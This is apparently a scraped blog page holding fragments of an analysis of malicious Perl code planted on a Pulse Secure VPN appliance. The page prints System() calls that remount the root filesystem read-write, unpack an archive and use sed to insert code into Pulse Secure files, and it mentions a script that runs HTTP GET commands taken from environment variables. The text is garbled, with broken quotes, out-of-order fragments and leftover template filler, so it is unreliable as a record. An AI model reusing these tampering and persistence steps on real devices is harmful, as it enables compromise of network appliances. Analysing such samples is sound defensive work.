Pulse secure connect11/7/2022 ![]() System("/bin/tar -f /tmp/new-pack.tar -u. System("/bin/sed -i '/packdecrypt/r Nc3Gy.pm'. System("/usr/bin/gzip -c /tmp/new-pack.tar > /tmp/new-pack.tgz") root/home/webserver/htdocs/dana-na/licenseserver/licenseserverproto.cgi") System("/usr/bin/gzip -d /tmp/new-pack.tgz") System("/bin/sed -i '/^sub main/r 1uMfVB'. System("/bin/sed -i '/^use DSUtilTable/r Mj1Za'. System("/bin/sed -i '/DSINSTALL_CLEAN/r K872Bu'. ![]() System("/bin/mount -o remount,rw /dev/root /") ![]() ![]() This code is designed to modify several Pulse Secure system files using the SED command as well as attempt to install code from within an archive named new-pack.tgz expected to be currently stored on the target system. The Pulse Secure Perl script also contains the following suspicious live / uncommented code. # print "Results of '$cmd' execution:\n\n" This is a Perl script that executes a HTTP GET command stored in the environment variables $ENV) ![]()
0 Comments
Leave a Reply.AuthorWrite something about yourself. No need to be fancy, just an overview. ArchivesCategories |